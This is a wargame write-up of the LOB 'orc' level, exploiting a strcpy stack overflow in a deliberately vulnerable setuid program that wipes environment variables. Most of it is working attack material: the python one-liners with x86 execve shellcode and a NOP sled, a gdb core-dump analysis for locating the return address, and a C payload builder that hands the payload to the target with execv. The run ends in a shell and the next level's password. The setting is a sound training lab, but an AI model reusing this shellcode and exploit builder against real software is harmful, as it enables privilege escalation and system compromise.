[LOB] goblin -> orc
2019. 7. 28. 23:43 | Wargame & CTF/LOB
```c
/*
        The Lord of the BOF : The Fellowship of the BOF
        - orc
        - egghunter
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* memset, strlen, strcpy */

extern char **environ;

int main(int argc, char *argv[])
{
        char buffer[40];
        int i;

        if(argc < 2){
                printf("argv error\n");
                exit(0);
        }

        // egghunter: zero every environment string, so shellcode stored
        // in an environment variable (eggshell) is wiped before the overflow
        for(i=0; environ[i]; i++)
                memset(environ[i], 0, strlen(environ[i]));

        // byte 47 of argv[1] is the most significant byte of the value that
        // overwrites RET; it must be 0xbf, i.e. RET has to point into the stack
        if(argv[1][47] != '\xbf')
        {
                printf("stack is still your friend.\n");
                exit(0);
        }

        strcpy(buffer, argv[1]);   // no length check: 40-byte buffer, attacker-controlled length
        printf("%s\n", buffer);
        return 0;
}
```
Because of the egghunter, which zeroes every environment string before the overflow happens, the eggshell technique (shellcode planted in an environment variable) can no longer be used. The check `argv[1][47] != '\xbf'` adds a second constraint: byte 47 of argv[1] is the most significant byte of the value that lands in RET, so RET must be a 0xbfxxxxxx address, i.e. it must point into the stack.

Stack layout of main's frame:

[buffer(40)][SFP(4)][RET(4)]

argv[1] is therefore 44 bytes of filler followed by the 4-byte RET. Since the environment is gone, put the shellcode in argv[2], which the egghunter does not touch, and make RET point at argv[2].
```
[goblin@localhost tmp]$ ./orc `python -c 'print "A"*44+"\xbf\xbf\xbf\xbf"'` `python -c 'print "\x90"*1000+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA¿¿¿¿
Segmentation fault (core dumped)
[goblin@localhost tmp]$ gdb -q orc core
Core was generated by `./orc AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA¿¿¿¿ '.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...done.
Reading symbols from /lib/ld-linux.so.2...done.
#0  0xbfbfbfbf in ?? ()
(gdb) x/80x $esp
0xbffff6d0:     0x00000000      0xbffff714      0xbffff724      0x40013868
0xbffff6e0:     0x00000003      0x08048450      0x00000000      0x08048471
0xbffff6f0:     0x08048500      0x00000003      0xbffff714      0x08048390
0xbffff700:     0x0804860c      0x4000ae60      0xbffff70c      0x40013e90
0xbffff710:     0x00000003      0xbffff824      0xbffff82a      0xbffff85b
0xbffff720:     0x00000000      0xbffffc5d      0xbffffc72      0xbffffc8a
0xbffff730:     0xbffffca9      0xbffffccb      0xbffffcdd      0xbffffce9
0xbffff740:     0xbffffeac      0xbffffecb      0xbffffee5      0xbffffefa
0xbffff750:     0xbfffff05      0xbfffff1e      0xbfffff2d      0xbfffff35
0xbffff760:     0xbfffff46      0xbfffff54      0xbfffff62      0xbfffff73
0xbffff770:     0xbfffff81      0xbfffff8c      0xbfffff9e      0xbfffffda
0xbffff780:     0xbfffffe2      0x00000000      0x00000003      0x08048034
0xbffff790:     0x00000004      0x00000020      0x00000005      0x00000006
0xbffff7a0:     0x00000006      0x00001000      0x00000007      0x40000000
0xbffff7b0:     0x00000008      0x00000000      0x00000009      0x08048450
0xbffff7c0:     0x0000000b      0x000001f7      0x0000000c      0x000001f7
0xbffff7d0:     0x0000000d      0x000001f7      0x0000000e      0x000001f7
0xbffff7e0:     0x00000010      0x0f8bfbff      0x0000000f      0xbffff81f
0xbffff7f0:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff800:     0x00000000      0x00000000      0x00000000      0x00000000
(gdb)
0xbffff810:     0x00000000      0x00000000      0x00000000      0x69000000
0xbffff820:     0x00363836      0x726f2f2e      0x41410063      0x41414141
0xbffff830:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff840:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff850:     0x41414141      0xbfbf4141      0x9000bfbf      0x90909090
0xbffff860:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff870:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff880:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff890:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff8a0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff8b0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff8c0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff8d0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff8e0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff8f0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff900:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff910:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff920:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff930:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff940:     0x90909090      0x90909090      0x90909090      0x90909090
```
First trigger a segmentation fault with a dummy RET of 0xbfbfbfbf (it passes the 0xbf check and crashes at an address that is easy to recognise in gdb), dump the core, and analyze it. If the "core dumped" message does not appear, the reason is usually that the target is a setuid binary, and the kernel refuses to write core files for setuid processes: make a tmp directory, copy orc into it and run the copy, which is owned by you and no longer setuid. Its stack layout matches the real binary as long as you start it the same way (`./orc`, same environment). If that still does not work, `ulimit -c unlimited` should fix it.

Reading the dump: the argv array at 0xbffff714 holds argv[0] = 0xbffff824, argv[1] = 0xbffff82a and argv[2] = 0xbffff85b. At 0xbffff850 the end of argv[1] is visible (`41 41 bf bf bf bf 00`), and the 0x90 bytes of argv[2] begin right after, at 0xbffff85b, and continue past the end of the dump.

If RET is set anywhere in the range [first 0x90, last 0x90], execution slides down the NOPs (0x90 does nothing and falls through to the next instruction) until it reaches the shellcode, which then runs. This is called a NOP sled; its point is that RET does not have to hit one exact address. Here the sled covers 0xbffff85b through 0xbffffc42 (1000 bytes) and the shellcode starts at 0xbffffc43. I will put 0xbffff901 into RET: it lies inside the sled, its top byte 0xbf satisfies the check, and none of its bytes is 0x00, so strcpy copies it intact. In little-endian order it is written as "\x01\xf9\xff\xbf".
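As an added example, not code from the original post, here is the same payload built in C instead of the two python one-liners, together with the two checks a practitioner wants before running it: that every byte of RET survives strcpy (no 0x00 byte) and passes the 0xbf test, and that RET falls inside the NOP sled rather than before it or past the shellcode. The 44-byte filler, the 1000-byte sled, the shellcode and argv[2]'s address 0xbffff85b are taken from the post and its core dump; the 'A' filler byte and the optional target path handed to execv are assumptions. It goes beyond the post's single RET value by validating any candidate address.

```c
/* Payload builder for the orc egghunter level (added example, not the post's code).
 * Offsets come from the post's stack layout [buffer(40)][SFP(4)][RET(4)];
 * the argv[2] address 0xbffff85b comes from its core dump. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <unistd.h>

#define BUF_SIZE   40                     /* char buffer[40] */
#define SFP_SIZE   4                      /* saved frame pointer */
#define RET_OFF    (BUF_SIZE + SFP_SIZE)  /* 44: offset of RET inside argv[1] */
#define ARGV1_LEN  (RET_OFF + 4)          /* 48: argv[1][47] is RET's top byte */
#define NOP_LEN    1000                   /* sled length used by the post */

/* execve("/bin//sh") shellcode from the post: 25 bytes, contains no 0x00 */
static const unsigned char shellcode[] =
    "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
    "\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80";

/* Can this RET be delivered? strcpy stops at the first NUL, so no byte of RET
 * may be 0x00, and the program requires argv[1][47], the most significant byte
 * on little-endian x86, to be 0xbf (a stack address). Returns 1 if usable. */
int ret_is_deliverable(uint32_t ret)
{
    for (int i = 0; i < 4; i++)
        if (((ret >> (8 * i)) & 0xff) == 0x00)
            return 0;
    return ((ret >> 24) & 0xff) == 0xbf;
}

/* Does RET land inside the sled [sled_start, sled_start + nop_len)?
 * Before the sled or inside/after the shellcode body means a crash. */
int ret_in_sled(uint32_t sled_start, size_t nop_len, uint32_t ret)
{
    return ret >= sled_start && ret < sled_start + nop_len;
}

/* Fill argv[1]: 44 filler bytes ('A' is an arbitrary choice), then RET in
 * little-endian order, NUL-terminated. Returns 0, or -1 if RET is unusable. */
int build_argv1(unsigned char out[ARGV1_LEN + 1], uint32_t ret)
{
    if (!ret_is_deliverable(ret))
        return -1;
    memset(out, 'A', RET_OFF);
    for (int i = 0; i < 4; i++)
        out[RET_OFF + i] = (ret >> (8 * i)) & 0xff;
    out[ARGV1_LEN] = '\0';
    return 0;
}

/* Fill argv[2]: NOP sled followed by the shellcode, NUL-terminated.
 * out must hold nop_len + sizeof shellcode bytes. Returns the payload length. */
size_t build_argv2(unsigned char *out, size_t nop_len)
{
    size_t sc_len = sizeof shellcode - 1;   /* drop the literal's terminator */
    memset(out, 0x90, nop_len);
    memcpy(out + nop_len, shellcode, sc_len);
    out[nop_len + sc_len] = '\0';
    return nop_len + sc_len;
}

int main(int argc, char *argv[])
{
    uint32_t sled_start = 0xbffff85b;   /* argv[2] in the post's core dump */
    uint32_t ret = 0xbffff901;          /* the post's RET choice */
    unsigned char a1[ARGV1_LEN + 1];
    unsigned char a2[NOP_LEN + sizeof shellcode];

    if (build_argv1(a1, ret) < 0 || !ret_in_sled(sled_start, NOP_LEN, ret)) {
        fprintf(stderr, "RET 0x%08x is not usable\n", ret);
        return 1;
    }
    build_argv2(a2, NOP_LEN);

    if (argc > 1) {   /* e.g. ./build_payload ./orc : hand both strings to the target */
        char *args[] = { argv[1], (char *)a1, (char *)a2, NULL };
        execv(argv[1], args);
        perror("execv");
        return 1;
    }
    printf("argv[1]: %zu bytes, argv[1][47] = 0x%02x\n", strlen((char *)a1), a1[47]);
    printf("argv[2]: %zu bytes, sled 0x%08x..0x%08x, shellcode at 0x%08x\n",
           strlen((char *)a2), sled_start, sled_start + NOP_LEN - 1, sled_start + NOP_LEN);
    return 0;
}
```

Run without arguments it only reports the layout it computed; given the path of a target binary it passes the two strings to execv exactly as the shell did with the backtick substitutions (command substitution strips python's trailing newline, so the lengths match). The NUL check matters in practice: 0xbffff900 is also inside the sled, but its low byte would end the strcpy one byte early and leave the old RET's top byte in place.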
```
[goblin@localhost goblin]$ ./orc `python -c 'print "A"*44+"\x01\xf9\xff\xbf"'` `python -c 'print "\x90"*1000+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
bash$ my-pass
euid = 504
cantata
```
orc : cantata